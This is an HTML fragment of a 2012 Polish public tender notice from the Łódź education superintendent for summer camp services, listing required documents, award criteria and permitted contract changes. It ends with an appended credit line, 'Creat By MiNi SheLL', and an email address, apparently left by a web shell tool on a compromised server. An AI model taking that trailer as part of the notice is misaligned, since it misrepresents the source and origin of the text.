<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - standard obiektu - 25</li>
<li>3 - oferta programowa - 25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 dopuści zmianę umowy dotyczącą przedmiotu zamówienia lub umówionego terminu wykonania zamówienia w następujących przypadkach:
1. Zmiany terminu wykonania przedmiotu zamówienia, w szczególności w sytuacji wystąpienia 
      okoliczności, których nie można było przewidzieć w chwili zawarcia umowy tj. z powodu 
      okoliczności siły wyższej, wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, 
      którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub 
      zdrowiu ludzi lub grożącego powstaniem, szkody w znacznych rozmiarach. Zmiana terminu będzie 
      uzależniona od okresu działania siły wyższej oraz okresu potrzebnego do usunięcia skutków tego 
      działania.
2. Zmiana lokalizacji obiektu kolonijnego, w którym organizowane są kolonie letnie ze względu na 
     zaistnienie zdarzeń losowych, których nie można było przewidzieć na etapie składania ofert (np. 
     pożar, powódź) - w takim przypadku Wykonawca winien jest udokumentować Zamawiającemu 
     konieczność zmiany obiektu kolonijnego. Zmiana lokalizacji obiektu kolonijnego będzie możliwa, 
     o ile Wykonawca zaoferuje obiekt kolonijny o takim samym standardzie jak w złożonej ofercie 
     przetargowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kuratorium.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Łódzki Kurator Oświaty
90-446 Łódź
al. Kościuszki 120a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2012 godzina 09:00, miejsce: Łódzki Kurator Oświaty
90-446 Łódź
al. Kościuszki 120a    pok. 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com